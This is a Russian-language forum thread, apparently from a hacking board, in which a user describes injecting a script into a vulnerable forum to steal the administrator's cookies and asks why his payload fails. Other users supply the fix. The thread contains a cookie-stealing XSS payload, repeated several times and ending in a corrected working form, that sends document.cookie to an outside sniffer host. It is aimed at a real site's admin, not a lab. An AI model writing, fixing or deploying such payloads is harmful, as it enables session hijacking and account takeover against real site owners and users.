Нашел уязвимый форум, где можно вставить <script></script> . Чтобы забрать cookies админа отправил ему сообщение <script>img = new Image(); img src = "http://antichat.org/s/a1nt.gif?"+document.cookie;</script>
Где картинк - сниффер на antichat.org. Но когда я написал этот код в html и открыл браузером - моя загрузка в лог добавлена не была, только когда напрямую обращаюсь к http://antichat.org/s/a1nt.gif, мой IP добавляется. В чем же все-таки проблема и стоит ли мне ждать админских cookies?

Посмотри что у тебя в сорсе сообщения. Может фильтруются символы какие-нибудь.

В том то и дело, что уязвимость проверенная. Я не понимаю почему конструкция
<script>img = new Image(); img src = "http://antichat.org/s/a1nt.gif?"+document.cookie;</script>
Не работает на моем компьютере.

<script>img = new Image(); img src = "http://antichat.org/s/a1nt.gif?"+document.cookie;</script>
<script>img = new Image(); img.src = "http://antichat.org/s/a1nt.gif?"+document.cookie;</script>
Найди отличие

Найди отличие

я помогу.

<script>img = new Image(); img src = "http://antichat.org/s/a1nt.gif?"+document.cookie;</script>

<script>img = new Image(); img.src = "http://antichat.org/s/a1nt.gif?"+document.cookie;</script>

<script>img = new Image(); img.src = "http://antichat.org/s/a1nt.gif?"+document.cookie;</script>
точку забыл!

a1nt, это приватная инфа - в паблике нету...

dracula4ever, D1mOn: Пять за сообразительность :-)

Епс!! Надо ж так... Ухххх..... Спасибо что ткнули носом, извините за ламеризм.